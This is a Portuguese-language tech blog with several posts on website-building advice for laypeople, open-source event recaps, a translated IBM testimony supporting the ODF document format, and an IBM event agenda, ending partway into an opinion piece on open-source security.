No fim do evento vários clientes, parceiros, meu ex-chefe e o pessoal da Novell me comrpimentou dizendo que fiz a melhor apresentação.

Fiquei lisongeado e orgulhoso. Principalmente quando todas as outras apresentações foram tão boas.

Confira se o evento vai para sua cidade, e venha. É gratuito.

Arquivo da apresntação em ODF (5.1 MB) para OpenOffice.org e outros e em PDF (7.4 MB).

Como Criar um Website

Este guia é para você que é leigo em computadores, mas que precisa contratar alguém para fazer o site de sua empresa, restaurante, hotel, etc. Vai ajudá-lo a ter um site mais acessível, prático e funcional, usando padrões e técnicas novas e que os usuários gostam, e deixando de lado as técnicas não muito naturais da web, ou que não é de boa prática o seu uso.

Quando for comprar serviços para criar seu site, exija os seguintes pontos (os links levam para as explicações):

  1. Quero um site onde eu mesmo posso atualizar o conteúdo, como se fosse um blog.
  2. Onde hospedar o site, em que computadores ele vai rodar ?
  3. O site/blog não pode ser feito em Flash.
  4. O site/blog deve ser compatível com qualquer browser em qualquer plataforma, principalmente Firefox, Internet Explorer, Safari e Opera.
  5. Não é necessário ter uma animação de abertura.
  6. Não pode haver popups nem frames, deve ser de fácil navegação e usar permalinks semânticos.
  7. O site/blog deve conter informações objetivas e precisas.
  8. O site/blog deve usar tecnologias abertas e não-proprietárias.

Seguem os detalhes de cada ponto…

Não se chama mais site, agora é blog

Blogs estão na moda, então entre na moda.

Não é a toa. Se você disser “entre no blog do meu restaurante” ao invés de “site”, as pessoas sabem que estarão mais próximas de quem criou a informação ali, e não só da informação em sí. Na cabeça das pessoas, um site raramente é atualizado, mas um blog sempre tem novidades. O já conhecido formato de blog sugere que os visitantes poderão interagir, comentar.

Não conte para ninguém, mas site e blog são praticamente a mesma coisa, mas optando pelo formato de blog abre um leque de opções do uso de ferramentas já prontas para facilmente gerenciar seu conteúdo. Isso significa que seu site (ou blog) ficará pronto mais rápido (instantaneamente, na verdade), com mais funcionalidades, nasce bonito, e organizado de um jeito já familiar para as pessoas, além de ser interativo.

Outra vantagem de um blog é que você mesmo vai poder configurar e atualizá-lo tão facilmente quanto escreve um e-mail.

O visual de um sistema de blog como o WordPress é definido pelo tema usado. A idéia de temas pode ser comparada a uma roupa que se veste: troque de roupa e mude seu visual sem tocar no conteúdo, da mesma forma que troca-se o tema de seu blog sem interferir no conteúdo textual etc.

Há uma infinidade de temas gratuitos genéricos prontos na web, mas para uma empresa, estabelecimento, etc o ideal é contratar um webdesigner para criar (ou adaptar) um tema específico, com o seu logotipo e a sua cara. O trabalho técnico para executar esse trabalho dura aproximadamente 1 semana, e no caso do WordPress.org, o webdesigner deve ter conhecimento de PHP, além dos básicos XHTML e JavaScript (não precisa lembrar esses nomes, só garanta que seu webdesigner conhece tais tecnologias).

Em que computadores seu site vai rodar, onde hospedar ?

O custo mensal para se ter um blog/site é baxíssimo. No Brasil pode-se contratar excelentes provedores de espaço como a Insite por aproximadamente R$16 por mês. Já incluso todas as ferramentas necessárias para criar o blog, como o WordPress.org.

DreamHost bannerO provedor que escolhi para este meu site é o DreamHost que fica nos EUA. Por uns R$70 por ano eles me dão 230GB de espaço, mais banda praticamente ilimitada e um ótimo serviço. Alí pode-se rodar um blog WordPress.org, ou outros softwares que facilitarão a sua vida para gerenciar o conteúdo, seja textos, fotos, multimídia, etc: Drupal, Joomla, Gallery etc.

Seu site vai morar em computadores que rodam Linux (por oferecer maior segurança e estabilidade) e seus usuários Linux, Windows, Mac ou qualquer outro poderão navegar nele sem problema.

Evite Flash

Flash é a tecnologia que permite animações bonitinhas em sites da web, mas que começou a ser impropriamente usada para fins mais centrais de alguns sites, até o ponto enlouquecido de o site inteiro ser feito em Flash.

É ruim para seus visitantes: Flash é uma tecnologia proprietária, e nem todos os seus visitantes vão tê-lo instalado. E os que tiverem talvez o terão numa versão antiga (você lembra de ter atualizado seu Flash alguma vez?). Visitantes que usam Linux por exemplo — 20% da web aproximadamente — em geral não tem. Não exclua seus usuários.

É ruim para seu blog: Há uma ciência oculta na web chamada Search Engine Optimization (ou Otimização Para Sistemas de Busca), em que profissionais especializados conseguem fazer um site aparecer no topo da pesquisa por palavras em sites como o Google, Yahoo, MSN Search, etc. Bem, qualquer palavra ou link (isso inclui menus que levam ao texto) contidas em arquivos Flash serão invisíveis ao Google, fazendo seu blog praticamente desaparecer em resultados de busca. Os potenciais clientes que usam o Google e companhia para procurar coisas que você vende também desaparecerão.

Use Flash somente em coisas marginais e mesmo assim em elementos que não interferem na informação que seu site/blog provê.

Existem outros browsers

Lembre-se que o browser que você e seu produtor de site usam pode não ser o mesmo de todos os seus visitantes. O Firefox já usado por uns 30% da web. Para acertar neste ponto, garanta que seu blog é bem visto no Firefox, Safari (popular no Mac), Opera (popular em celulares) e Internet Explorer.

A Internet não é um panfleto de propaganda

Uma das coisas mais inúteis e irritantes de muitos sites é a tal da apresentação inicial, geralmente feita em Flash. Claro que há o link para “pular a animação” mas se este também estiver embutido no Flash pode dizer adeus a alguns visitantes: o resto de seu site é inacessível e contribui para a tal exclusão digital.

Um panfleto é recebido na rua de forma passiva, e a capa deve ser atraente para que o usuário queira abrir e ver o resto. Na Internet é diferente. Dificilmente alguém vai “cair” no seu site por acaso. As pessoas ativamente te clicaram porque acreditam que você tem a informação que elas precisam. Não as aborreça com essas apresentações iniciais. Em suma, isso só serve para duas coisas: dar uma desculpa ao webmaster que você contratou para te mostrar seus conhecimentos em operar o programa que cria aquilo, e gastar seu dinheiro pelas horas de trabalho cobradas.

Use melhor as horas pagas ao seu web-designer e peça para ele criar um site/blog semântico, que os mecanismos são capazes de ler.

Morte aos Popups

Sobre as tais janelas saltitantes que surgem quando clicamos em links de sites mal feitos, saiba que browsers modernos corretamente as bloqueiam. Se você as vê na hora que está testando seu site pela primeira vez, provavelmente foi porque o browser foi explicitamente configurado para deixá-las saltar. Em geral seus usuários não as verão.

Os popups tem outro sério problema: em sites mal feitos, certas informações preciosas só podem ser encontradas dentro de popups, e como essas janelinhas estão fora do fluxo de navegação normal (como Flash) essas informações também serão invisíveis ao Google e companhia, e não aparecerão nos resultados de busca.

Estabeleça a idéia de que todo pedaço de informação em seu site deve poder ser acessível diretamente por links externos (também conhecidos por “permalinks“), e não só navegando via a página principal.

Seus clientes querem te ligar

Você ficará surpreso em saber quantas pessoas tem preguiça de ler ou gastar 5 minutos (ou mais, se o site for desestruturado) navegando em seu blog para encontrar o que procuram.

Para aproximá-las de você, deixe seu telefone com código de área visível em todas as páginas, por exemplo no final de cada uma. Só e-mail não basta. Muito menos formulário para entrar em contato. Lembre-se: de qualquer forma, antes da Internet o único jeito de contactarem seu estabelecimento era por telefone.

Se o seu estabelecimento for um serviço, restaurante, hotel, loja, vai perceber que a maioria liga para saber onde fica, preços, se está lotado, o que há no cardápio, etc. Quando as perguntas freqüentes ficaram óbvias, trate de criar páginas com respostas claras no seu site, mapas interativos como o abaixo, etc.

map
map
Restaurante Maha Mantra
map
Cantina do Mello

Evite tecnologias proprietárias

Use padrões abertos. Eles estão disponíveis, são mais baratos, e te dão mais flexibilidade que as tecnologias proprietárias.

Não é exatamente o webdesigner quem deve escolher as tecnologias usadas em seu site. Ele vai te sugerir as que ele conhece, mas não necessariamente são as melhores para você.

Um site/blog desenvolvido com tecnologias proprietárias te forçará a ter que pagar por elas pelo resto da vida de seu site. E saiba que a cultura da Internet criou diversas tecnologias abertas, muitas vezes melhores, muitas vezes gratuitas, que te dão escolha, poder de negociação, etc.

Veja uma comparação:

Tecnologias Proprietárias (evite) Tecnologias Abertas (prefira)
Flash DHTML, Ajax, XHTML+JavaScript
ASP, ASP.NET JSP, PHP
.NET, C#, Cold Fusion, Delphi etc Java, Java Enterprise ou J2EE
Windows ou qualquer outro sistema operacional Linux
Mídia em formatos WMA, WMV e Real Mídia em formatos MP3, AAC, MPEG e Xvid (ou DivX)

Outros detalhes

  • Seu site ou blog deve usar a codificação UTF-8 ou Unicode. Esta técnica é a garantia de que acentos vão aparecer corretamente em qualquer browser e sistema operacional.
  • Evite também frames. Eles nasceram a partir de um erro de projeto, são considerados obsoletos, tem problemas similares aos popups e Flash, violam padrões, e seus criadores se arrependeram de te-los criado.

Pré-FISL em São Paulo

Acabei de sair do evento Pré-FISL em São Paulo, organizado pela 4Linux.

Foi ótimo. Com palestras e palestrantes de alta qualidade. Confira:

  • Josh Berkus, do PostreSQL, esclareceu a evolução do projeto e comunidade. Contou que a versão 8.3 do PostreSQL vai suportar DBs de vários terabytes, e que a performance da versão 8.2 atual já é comparável com o MySQL. Contou também que os nichos do PostreSQL e do MySQL são diferentes. O primeiro está focado em grandes bancos, enquanto o MySQL tende a usos exóticos ou a bancos pequenos ou até em RAM. Sobre suporte a XML do PostgreSQL mostrou os primeiros passos, mas explicou que não chegam nem perto do DB2 nesse ponto. Outro gráfico interessante é a relação do custo-benefício comparado a um “banco de dados proprietário” de cor vermelha: 80% do benefício por 15% do custo total de propriedade.
  • Maddog fez uma apresentação de tom idealista sobre thin clients, contando como terminais burros eram usados antigamente e a vida das pessoas era mais fácil. Argumentou que o projeto One Laptop Per Child é bonito mas o que importa não é o hardware e sim a conectividade em todo lugar. Quando questionei que muitas empresas já usam thinclient mas em Windows, e que o que falta é uma abordagem de mudança cultural menos infraestrutural e mais no nível das aplicações (convertendo-as para web ou para padrões abertos), ele disse que é só uma questão de volume. Quero ver… Seja como for, nós adultos também queremos um laptop conectado !
  • Jomar Silva, diretor geral da ODF Alliance Brasil, falou por uns minutos sobre ODF e sua importância para os usuários, empresas e desenvolvedores de aplicações.
  • Cezar Taurion falou pela IBM com uma palestra entitulada “Renascimento 2.0”, onde usou seu raciocínio claro e pragmático para explicar o modelo Open Source, e como ele se encaixa num modelo empresarial. Falou sobre o conceito Long Tail e como ele está relacionado a era do Mundo de Pontas.
  • Kristian Kielhofner falou sobre o Asterisk. Muito interessante. Mas a maior sensação foi seu celular Nokia que suporta SIP. Ou seja, para qualquer contato de sua lista telefônica, ele pode fazer uma ligação normal (por GSM) ou por VoIP, gastando bytes de seu plano IP (mais barato) e economizando minutos de seu plano de voz (mais caro). Segundo ele, os aparelhos Nokia da linha E e N estão anos a frente de qualquer outro fabricante por sua integração com VoIP. Ele consegue rotear seu ramal do trabalho, ou seu telefone de casa para seu celular, não por followme, mas por IP — Nokia é o celular dos geeks. Mostrou também um gadget que parece um isqueiro com porta ethernet: trata-se de um computador com WiFi que tem 256MB de RAM e AstLinux já instalado, boota em segundos com Linux, Asterisk e um firewall, e lhe serve como uma central telefônica portátil para viagens.
  • Amauri Zavatin, da Caixa Econômica, impressionou todos contando como o banco social está aos poucos usando Linux em todos os lugares. Dentro de um ano, todos os terminais dos caixas e ATM serão thin clients Linux. BrOffice.org já está sendo massivamente usado, com ordem da presidência, e há prazo de 6 meses para desinstalar o MS Office. Intranet foi toda redesenvolvida em Java e Zope, e está servindo como piloto para a próxima Internet do banco. Diminuiram em 70% os gastos com impressão porque começaram a controlar seu uso com ferramentas open source. Des-terceirizaram todo o negócio das casas lotéricas (por causa das notícias de corrupção) redesenvolvendo todas as aplicações internamente com Java e Linux, e o projeto saiu por uma fração do que foi previsto. Etc etc etc. Esta palestra serviu como um termômetro do uso de Open Source de forma corporativa, responsável e séria.
  • Louis Suarez-Potts, da Collab.net, fez uma palestra emocionada sobre OpenOffice.org e ODF, convocando mais colaboradores para os diversos projetos atrelados ao OOo. Explicou que pode-se contribuir para a suite em sí, mas também para os subprojetos de marketing, empacotamento, artwork, testes, plugins e extensões.

O evento fechou com um coquetel informal onde reencontrei velhos amigos como o Luiz Blanes e outros.

A casa estava cheia, e espero que o evento se repita ano que vem. Tem tudo para se tornar tradição em São Paulo.

Um Tratado sobre Padrões Abertos e ODF

Bob Sutor, diretor da IBM que tem a missão de fomentar Padrões Abertos e Open Source no mercado, tem também a responsabilidade de comunicar a importância do OpenDocument Format (ou ODF).

Publicou em seu blog um pronunciamento feito ao congresso do estado do Texas, que está em fase de votar uma lei a favor da adoção do ODF. É um tratado edificante sobre a importância social e mercadológica dos Padrões Abertos (instanciados aqui no ODF). As idéias e raciocínio deste documento podem ser facilmente adaptados para serem ouvidos por qualquer orgão governamental, instituição pública ou privada do Brasil também, quanto mais agora devido a criação da nossa própria Aliança ODF.

Eis uma tradução integral:

2007/04/09: Revisada a tradução, a semântica, sintaxe e gramática por Tatiana Cymbalista.

Boa tarde/noite, Sr. Presidente e membros do Comitê. A IBM apóia este projeto de lei. Este projeto de lei trata do futuro, de mais concorrência e inovação e de dar mais opções para o Texas. É completamente consistente com a direção tecnológica e de propriedade intelectual da indústria do software.

Os atuais formatos de arquivos nos quais alguém grava documentos de escritório, usados pela maioria dos senhores e de seus cidadãos, são baseados em tecnologias e práticas dos anos 70, 80 e 90, pelas quais algumas companhias “prendiam” clientes a seus produtos e atualizações. Isso não é mais aceitável hoje em dia.

Quando os senhores e seus cidadãos encontram-se realmente restritos a um único fornecedor de software para acessar informações governamentais, vocês e eles pagam o que eu considero taxas. Padrões abertos evitam isso.

A primeira taxa é a diferença entre o que você precisa pagar para aquele fornecedor versus o custo mais baixo que pagaria se múltiplos fornecedores existissem e os preços tivessem que ser competitivos. Você também teria que pagar uma taxa de inovação. O fornecedor único tem motivos limitados para melhorar o produto. Idéias refrescantes de atores novos como os empreendedores do Texas, são mantidas fora da categoria do produto. Isso é ruim.

Aqueles que são contrários a este projeto de lei estão, em essência:

  • confortáveis em ter um único fornecedor;
  • satisfeitos com as políticas de licitação que permitem haver um único fornecedor de software de documentos para o governo;
  • razoavelmente felizes em pagar as taxas financeiras e de inovação acima.

A IBM não se contenta com este status quo. Nem os autores desse projeto de lei. Nem a maioria das indústrias; aquelas nas áreas de ciências naturais, educação, saúde, e assim por diante, que estão tendendo para padrões abertos. Com o advento da Internet, beaseada em padrões abertos como HTML, o valor dos padrões abertos reais tem sido comprovado.

Pensem sobre quão mais fácil, mais acessível, mais transparente é para vocês colaborar dentro do governo e se conectar com seus cidadãos graças à Internet e ao correio eletrônico, a blogs e a tudo aquilo que surgiu a partir de padrões abertos. É chegada a hora de levar esse poder de colaboração aos documentos e abri-los, dando controle aos governos e escolha aos cidadãos.

A IBM se juntou aos nossos colegas da indústria para trabalhar em um padrão aberto para formatos de arquivos, chamado de OASIS/ISO OpenDocument Format (ODF). Formatos de arquivos são meras especificações de como um documento é estruturado — cabeçalhos, rodapé, parágrafos — e de como ele deve ser salvo e intercambiado. O formato OpenDocument tem sido desenvolvido aberta e ativamente por uma comunidade global de especialistas de muitas organizações e tem sido amplamente implementado por vias independentes, tanto de código fonte aberto como proprietário.

Sua taxa de adoção está aumentando. Adolescentes estão usando-o. Políticos estão usando-o. Alguns diretores de tecnologia em organizações que oficialmente só usam formatos proprietários estão usando ODF em casa, quando chega a hora de gastar seu próprio dinheiro e experiência técnica para escolher produtos para seu uso pessoal. A enorme e crescente base de usuários de Open Office está gravando e distribuindo arquivos em formato ODF. A próxima geração do Lotus Notes da IBM irá suportá-lo ainda este ano.

Então por que vocês precisam de legislação sobre isso ?

Primeiro, porque o Texas, como um estado soberano e uma potência no mercado de TI, deve, na minha opinião, ser capaz de fazer o que bem entender com os documentos de escritório que cria. Isso se aplica aos documentos de hoje, mas também aos documentos que serão criados amanhã e que serão os registros históricos daqui a cinqüenta anos. Vocês têm a oportunidade de claramente afirmar a posição de que o Texas não será refém de nenhum fornecedor para acessar as informações do próprio estado.

Segundo, porque as mudanças estão acontecendo agora e os usuários vão, ao longo do tempo, usar novas aplicações com novos formatos de arquivos baseados em documento. Eu nunca encontrei um diretor de tecnologia ou pessoa da área de finanças que me dissesse que nunca usará um novo software. Então, uma encruzilhada aproxima-se rapidamente e vocês precisam fazer uma escolha: escolher um único fornecedor e pagar essas taxas que mencionei, ou adotar formatos de documentos verdadeiramente abertos, que não são ditados por um único fornecedor, fomentam competição e inovação de várias origens e provêm verdadeira escolha de provedores e seus produtos.

Eu posso garantir que o software que teremos em cinqüenta anos vai funcionar de formas radicalmente diferentes e será fornecido por provedores completamente diferentes dos que conhecemos hoje. Devemos manter nossas opções abertas e, felizmente, com ODF temos uma excelente escolha comparada com qualquer alternativa. Além do mais, pessoalmente, eu apostaria na “inteligência das massas”, na coletividade de experts em TI que verdadeiramente domina padrões abertos e poderá nos preparar para o sucesso nos próximos anos. Depender de um único fornecedor para otimizar as ferramentas de seu próprio sucesso é solução do passado.

Em terceiro lugar, para ser claro, QUALQUER UM pode implementar um padrão aberto. Esse projeto de lei trata de escolha. ODF e padrões abertos para formatos de arquivos fomentam escolha de aplicações, usos inovadores da informação, mais competição e queda de preços. Pessoalmente, eu acho que essas coisas são boas.

Em conclusão, o mundo está se deslocando para padrões abertos, não-proprietários, baseado no incrível sucesso da Internet, um sucesso que foi bem mais importante do que a posição de mercado de um único fornecedor ou as suas idéias sobre o que seria correto para o mundo.
Nós podemos fazer isso novamente, mas temos que fazê-lo com cuidado. O Estado do Texas está em posição de mostrar aos seus cidadãos e ao mundo que esse sucesso pode ser repetido e que pretende liderar esse processo. O Texas pode mostrar que a frase “padrão aberto” significa mais do que um departamento de marketing de uma empresa diz que é.

Sr. Presidente e membros do comitê, padrões abertos de documentos são a apólice de seguro para seus documentos, em oposição ao risco de perda de documentos históricos esperando para acontecer. Eu vos agradeço pela oportunidade de testemunhar a favor do projeto de lei, e estou a disposição para responder a qualquer dúvida que tiverem.

Mapas Personalizados no Google Maps

Confira o novo Google Maps, que já era na minha opinião o serviço mais prático e legal da Internet.

A partir de hoje (não lembro de ter visto isso ontem) pode-se criar mapas personalizados com marcadores coloridos e balões com informações formatadas, como este mapa com legendas de Paraty e região.

Além do mais, pode-se exportar essas informações para um arquivo KML, importável no Google Earth. Mas como KML é um idioma XML aberto, pode-se usa-lo como meta informações geográficas em quaisquer outras aplicações. A imaginação do desenvolvedor de aplicações é o limite. Discretamente, KML irá se tornar um padrão aberto e universal para descrever metainformações em mapas.

Havia desenvolvido um plugin para WordPress (ou qualquer outro sistema de blog, ou página simples) para embarcar mapas interativos dentro de posts, capaz de incrementar posts como este (na verdade, a maioria de meus posts sobre viagens tem mapas interativos). Ele ainda é muito prático, porque a API do Google Maps ainda não provê um serviço para desenhar os novos mapas personalizados fora do próprio Google Maps. Mas duvido que isso demore a acontecer, e quando acontecer, das duas uma: ou o plugin vai ficar muito mais simples, ou ele vai se tornar completamente obsoleto.

Eu sou tão fascinado por mapas que provavelmente fui um cartógrafo em outra encarnação.

E para quem não sabe, o Google Maps e o GMail são os sites populares que primeiro usaram os conceitos de AJAX.

Evento de Virtualização da Novell

Novell Virtualization Tour

Não podemos deixar de marcar nossa presença no evento de virtualização da Novell. Confira as datas e cidades:

Brasil América Latina

No track da IBM vou fazer uma apresentação nova sobre virtualização, incluindo o tema quente da paravirtualização, mas passando também por virtualização de storage, virtualização de aplicações, e outras virtualizações pouco conhecidas, até chegar nos conceitos de Grid e SOA que são as vertentes mais sofisticadas de virtualização.

Inscreva-se gratuitamente nos links acima e garanta sua vaga.

ODF Alliance in Brazil

Yesterday was announced the ODF Alliance Chapter Brasil, being the fourth country to create this initiative, after US, India and Poland.

The founder members are the Brazilian offices of IBM, Red Hat and Sun. Jomar Silva, the director, told me this:

My understanding is that the Brazilian [ODF Alliance] operation has the mission to execute the work proposed by the ODF Alliance in our country. We are partners and fight together the same battle, exchanging experiences (and this is a very important point) so lessons learned with migration and adoption of ODF in other countries (governments and companies) may be used here.

Many software support today reading and writing of documents in the OpenDocument format, being OpenOffice.org the most popular. The user gains freedom of choice, becomes able of negotiation, and can choose for the best price-benefit performance. This user-suppliers dynamics works as a fuel for innovation.

ODF, being based on open standards as XML, plus having a free license, plus to be already and ISO standard (two steps ahead of OOXML, proprietary competitor by Microsoft), is a mark in IT’s history, when for the first time the user is truly the independent owner of his documents. This is simply a very powerful idea.

The Brazilian chapter of the ODF Alliance will focus, in its first days, to setup its web site — probably at www.br.odfaliance.org —, and to define policies to accept new members as companies, institutions, user groups and communities.

ODF Alliance, Capítulo Brasil

Foi anunciada ontem para a mídia a ODF Alliance – Chapter Brasil. Somos o terceiro país no mundo que criou esta iniciativa, depois da Polônia e da Índia.

Tem como membros fundadores as sucursais brasileiras da IBM, Red Hat, Sun e Jomar Silva como diretor, que me contou o seguinte:

Eu entendo que a operação brasileira tem como missão e papel realizar o trabalho proposto pela ODF Alliance em território brasileiro. Somos todos parceiros e lutamos juntos a mesma batalha, trocando experiências (e este é um ponto muito importante) para que as lições aprendidas com a migração e adoção do ODF por outros países (governos e empresas) possam ser utilizadas aqui.

Diversos softwares já oferecem hoje suporte de leitura e escrita de arquivos no formato OpenDocument, sendo o mais conhecido a universal suite OpenOffice.org. O usuário então ganha com isso liberdade de escolha, poder de negociação, e poder optar pela melhor relação custo-benefício. Essa dinâmica usuário-fabricantes funciona como combustível para a inovação.

ODF é um patrimônio de seus usuários e da humanidade. Baseado em padrões abertos como XML, somado aos fatos de ter uma licensa de uso livre, e de já ser um padrão ISO (dois passos à frente do OOXML, concorrente proprietário da Microsoft), assinala um marco na história da TI onde pela primeira vez o usuário é verdadeiramente dono independente de seus próprios dados, garantindo assim sua longevidade e interoperabilidade. É simplesmente uma idéia muito poderosa.

O ODF Alliance – Chapter Brasil tratará, em seus primeiros dias de vida, de levantar seu site em português — provavelmente em www.br.odfalliance.org —, e em definir critérios para receber novos membros, como empresas, instituições, grupos de usuários e comunidades.

Inclusão Digital

Já posso desencarnar feliz porque tenho um blog popular.

Meu post sobre Aquecimento Global é o campeão de audiência com 246 comentários neste exato momento, mas se você for verificar agora, o número já deve ter crescido. Até o final do ano deve facilmente chegar a 400 comentários.

Escrito numa noite mal dormida, de pesadelos, após ter assistido o filme do Al Gore, nunca tinha imaginado que seria tão visitado, e nem por esse tipo de público: a maioria são estudantes fazendo trabalho para a escola.

Uma conhecida que corrige redações de vestibular me disse uma vez que o nível dos textos é muito baixo. Confesso que achei que ela estava exagerando e sendo pessimista demais, mas minha opinião mudou depois do meu post popular.

Veja alguns comentários ali:

E a lista não pára…

A inclusão digital está acontecendo mais rápido do que qualquer outra inclusão.

Aproveitando, meus outros posts populares são o de download de música, o do Google Maps para WordPress, e o do tema do meu blog.

IBM no Oracle Open World

A IBM vai participar do evento Oracle Open World, nos dias próximos dias 27, 28 e 29 de março.

Local

Transamérica Expo Center, São Paulo.

Agenda

Parceiros, Cezar Taurion, outros especialistas da IBM e também eu, vamos mostrar casos de sucesso e novas idéias sobre diversos assuntos, inclusive Linux, Service Oriented Architecture, Padrões Abertos, Software as a Service, novidades nas plataformas de hardware da IBM etc. Confira a agenda:

Dia 27/03

11h00 – 11h40 System p (Unix) para Soluções Oracle

Conheça a tecnologia POWER IBM, com todo poder de processamento e capacidades avançadas de virtualização e alocação dinâmica de recursos. Ideal para empresas com missão crítica e com necessidades de flexibilização da sua área de TI, além de ser uma combinação perfeita com diversas soluções Oracle.

Palestrante: Mauro Minomizaki

11h45 – 12h15 Caso de sucesso – Unilever: Buscando a excelência através da implementação de ITIL

Com a implementação dos processos ITIL suportados pelo Siebel, a área de IT da Unilever Latin America busca consolidar sua excelência operacional para entregar aos seus clientes um serviço cada vez melhor.

Palestrante: José Ferroli (Unilever)

14h00 – 14h40 Modelos de negócio para padrões abertos e open source

A importância dos Padrões Abertos para a indústria e sociedade. Como empresas estão tirando vantagem disso. Modelos de negócios para Open Source, e como escolher entre Open Source e Closed Source.

Palestrante: Cesar Taurion (IBM)

14h50 – 15h20 Software como Serviço: rompendo os limites do modelo de aplicativos sob demanda

Conheça esta forte tendência do mercado, o modelo de software como serviços. Uma forma lexível de compra de soluções que consiste na entrega das funcionalidades de uma aplicação com o pagamento baseado em sua utilização.

Palestrante: Marcos Prete (IBM)

15h30 – 16h00 Parceiro: MPL

Soluções para empresas em que a performance dos projetos e gerenciamento dos riscos são críticos. Controle os custos de seus projetos em tempo real.

Palestrante: MPL

16h10 – 16h40 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

16h40 – 17h20 IBM Service Management for Oracle Applications – Oracle Optimization and Management

O IBM Service Management alavanca as práticas ITIL para reduzir tempo, custo e risco na entrega e gerenciamento de aplicações Oracle em ambientes heterogêneos, ajudando as empresas a reduzir o custo total de suas operações e a liberar os orçamentos para investimentos em inovação.

Palestrante: Jorge Cordenonsi

17h20 – 18h00 Por que Oracle no mainframe?

A Oracle e a IBM anunciaram em Outubro de 2006 uma forte parceria de aplicativos e Banco de Dados em plataforma mainframe – System z. Além disso, algumas dessas tecnologias já estão rodando em ambiente Linux do mainframe, com um ótimo TCO para clientes que buscam consolidação.

Palestrante: Roberto Santos (IBM)

18h00 – 19h00 Coquetel System z

Dia 28/03

11h00 – 11h40 Soluções Mid-Range de Storage para Oracle

Conheça as soluções voltadas ao mercado de pequenas e médias empresas, onde o volume de dados vem crescendo a cada dia. Além disso, veja os diferenciais com soluções Oracle e os últimos lançamentos voltados para esse mercado.

Palestrante: Wellington Menegasso

14h00 – 14h40 Sizing de Infraestrutura para Soluções Oracle

Veja como a IBM investe fortemente em seu Centro de Competência, bem como na ferramenta de sizing, garantindo o bom funcionamento do seu processo e trazendo economia às empresas, além de ser uma ótima oportunidade aos nossos parceiros de negócios.

Palestrante: Guilherme Araujo (IBM)

14h50 – 15h20 Software como Serviço: rompendo os limites do modelo de aplicativos sob demanda

Conheça esta forte tendência do mercado, o modelo de software como serviços. Uma forma flexível de compra de soluções que consiste na entrega das funcionalidades de uma aplicação com o pagamento baseado em sua utilização.

Palestrante: Marcos Prete (IBM)

15h30 – 16h00 Parceiro: HB Global

Soluções JD Edwards Oracle para Transporte e Logísitica

Palestrante: HB Global

16h00 – 16h30 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

16h30 – 17h10 Soluções Siebel com plataforma Unix IBM

Conheça as funcionalidades de nossa plataforma System p (UNIX) com o aplicativo Siebel Oracle, mostrando todo o valor agregado e benefícios que as empresas podem ter optando por essa solução.

Palestrante: Eduardo Pacini (IBM) e Sérgio Saldanha (Oracle)

17h20 – 18h00 Power Net – um programa direcionado para ISVs

PowerNet é um programa voltado a desenvolvimento de novos ISVs na plataforma System p. Venha conhecer todos os benefícios do programa e como a IBM está trabalhando com a Oracle. Extremamente focado para parceiros de negócios.

Palestrante: Marcelo Violento (IBM) e Sérgio Saldanha (Oracle)

18h00 – 19h00 Coquetel System p

Dia 29/03

11h00 – 11h40 Bladecenter com Soluções Oracle

Cada vez mais as empresas enfrentam problemas como redução de custos na área de TI, falta de espaço, problemas de refrigeração do seu CPD e gerenciamento de parques de servidores. O BladeCenter IBM pode resolver todos esses problemas com sua capacidade de

Palestrante: Ana Paula Tran

11h45 – 12h15 Caso de sucesso: Como atingir a otimização de processos com redução de custos e redução do número de transações de documentos em até 50%.

Melhoria do gerenciamento de risco, redução das complicações relacionadas a impostos e legais, melhoria da qualidade dos dados, maior cooperação dos empregados, otimização das ações da corporação, com maior rapidez nas soluções de possíveis dificuldades a

Palestrante: CVRD

14h00 – 14h40 A melhor distribuição Linux

Entenda o que são distribuições Linux, como estão posicionadas no mercado e na comunidade, as mais importantes, vantagens e desvantagens de cada uma, e como escolher a melhor para o seu negócio.

Palestrante: Avi Alkalay (IBM)

14h50 – 15h30 System i e JD Edwards: a combinação perfeita

Conheça a plataforma ideal para a solução de JD Edwards, o System i, dotado de tecnologia POWER. Possui alto poder de processamento, capacidades avançadas de virtualização e alocação dinâmica de recursos, além de ser uma máquina totalmente auto gerenciáve

Palestrante: Mauricio Conceição (IBM)

15h40 – 16h20 Otimize seu datacenter tirando o máximo de seu hardware

Conheça arquiteturas não-convencionais, mas que trazem benefícios financeiros enormes, para
virtualização, enjaulamento de aplicações, desktops multiusuários, clusters de alta disponibilidade, de custo baixo até os mais escaláveis, clusters para Grid e alta disponibilidade, e opções para desktop.

Palestrante: Avi Alkalay (IBM)

16h30 – 17h00 Parceiro: YKP

Conheças as Soluções CRM integradas ao JD Edwards

Palestrante: YKP

17h10 – 17h40 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

Estando no evento, não deixe de passar no stand da IBM.

Segurança em Open Source

Cezar Taurion, excelente consultor e colega de trabalho, engatou seu blog no developerWorks. Gostaria de complementar seu artigo da Linux Magazine de dezembro de 2006 com algumas aspectos sobre segurança.

Não há como afirmar que Open Source é mais seguro que Closed Source, ou que Closed Source é mais seguro que Open Source. Quem o afirma, geralmente faz por religião e não por análise fria.

Considero-me especialista em segurança, mas evito ao máximo tocar neste assunto ao falar com clientes em geral, quando o âmbito é Open Source. Só quando eles perguntam. Simplesmente porque cada um terá uma opinião, e porque nehuma opinião pode ser verdadeiramente constatada.

Vamos dividir o mundo Open Source em dois blocos. No primeiro desfilam as escolas do grupo 1, campeões de audiência como o Apache HTTP Server, Samba, boa parte do Kernel, Bind, OpenSSH, DHCP, Firefox, OpenOffice.org, libc, que são arrasadoramente populares, e literalmente seguram a festa da Internet no ar. A lista não é muito maior que essa.

